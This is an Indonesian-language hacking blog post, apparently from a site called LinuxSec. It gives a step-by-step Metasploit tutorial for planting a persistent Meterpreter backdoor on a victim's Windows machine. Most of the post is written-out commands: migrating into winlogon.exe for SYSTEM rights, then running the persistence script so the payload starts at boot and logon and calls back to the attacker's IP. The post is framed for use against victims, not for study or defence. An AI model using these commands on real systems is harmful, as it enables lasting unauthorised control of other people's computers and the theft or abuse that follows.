• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

How to Run Persistence Payload on Metasploit

February 19, 2016 by Jack Wilder 1 Comment

Kemarin kita sudah membahas cara meng-inject aplikasi windows dengan payloads. Nah , mungkin ada yang bertanya mungkinkah kita bisa langsung konek ke meterpreter session jika korban merestart / mematikan pc nya. Jadi kita tidak perlu melakukan exploit ulang ? Jawabannya sangat mungkin ^_^. 

Saya anggap kalian sudah mendapat meterpreter session disini.
Jika belum coba pelajari tutorial yang ini :
Backdooring EXE Files with Metasploit
Nah langsung saja ke tutorial.
Pertama, kita cek dulu hak akses kita sebagai apa.
meterpreter > getuid
Kalau seperti ss saya diatas, kita cuma user regular. Kita butuh hak akses lebih untuk membuat persistence payload.
meterpreter > ps
Nah kita bisa melihat proses apa saja yang berjalan. Kita migrasi ke proses yang dijalankan minimal oleh sistem. Kali ini saya migrasi ke proses winlogon.exe dengan PID 480 .
meterpreter > migrate 480
Jika sukses harus nya sekarang kalian bertindak sebagai system user.
meterpreter > run persistence -h
Untuk melihat command apa saja yang bisa dipakai.
Contoh command yang saya jalankan :
meterpreter > run persistence -A -U -X -i 20 -p 666 -r 192.168.48.1
-X berarti payloads berjalan saat sistem booting
-i adalah interval listening dari payload yang kita buat
-U artinya payload aktif saat user log on ke sistem.
-A berarti konek secara otomatis ke agent yang cocok dengan exploit/multi/handler
-p isi dengan port listener
-r adalah ip kita.
Nah untuk testing masukkan command
meterpreter > reboot 
untuk menguji apakah persistence payload yang kita buat berhasil.
Jika langkah langkah nya benar seharus nya kita langsung mendapatkan sesi meterpreter saat sistem windows aktif tanpa melakukan exploit ulang.
Untuk video nya biar lebih jelas simak dibawah :
Nah, bila kalian ingin menghapus persistence payload dari sistem korban masukkan command :
meterpreter > resource /home/uzumaki/.msf4/logs/persistence/WIN-IA0JPLFHM2G_20160219.0915/WIN-IA0JPLFHM2G_20160219.0915.rc
link file .rc nya sesuaikan sendiri dengan link yang dibuat saat menjalankan command untuk membuat persistence payload.
Sekian tutorial kali ini semoga bermanfaat.

Filed Under: Uncategorized Tagged With: Hacking, Metasploit

Reader Interactions

Comments

  1. xhak says

    September 28, 2019 at 1:14 pm

    bang itu ga timeout ya??
    tolong ajarin cara biar ga timeout bang

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

GitHub Custom Domain or Subdomain Takeover

Command Injection Bypass Cheatsheet

Open Redirect Bypass Cheat Sheet

FCKeditor Bypass Shell Upload With Burp Suite Intercept

Upload Backdoor Lewat MySQL Database (phpMyAdmin)

Hack Targeted Website using Reverse IP

Deface dengan Metode Timthumb Remote Code Execution

Deface WordPress dengan Exploit WordPress Plugins WPShop File Upload Vulnerability

RCE pada Redis via Master-Slave Replication

Deface WordPress dengan Exploit WordPress TheLoft Theme Arbitrary File Download Vulnerability

LinuxSec / 13 queries in 0.11 seconds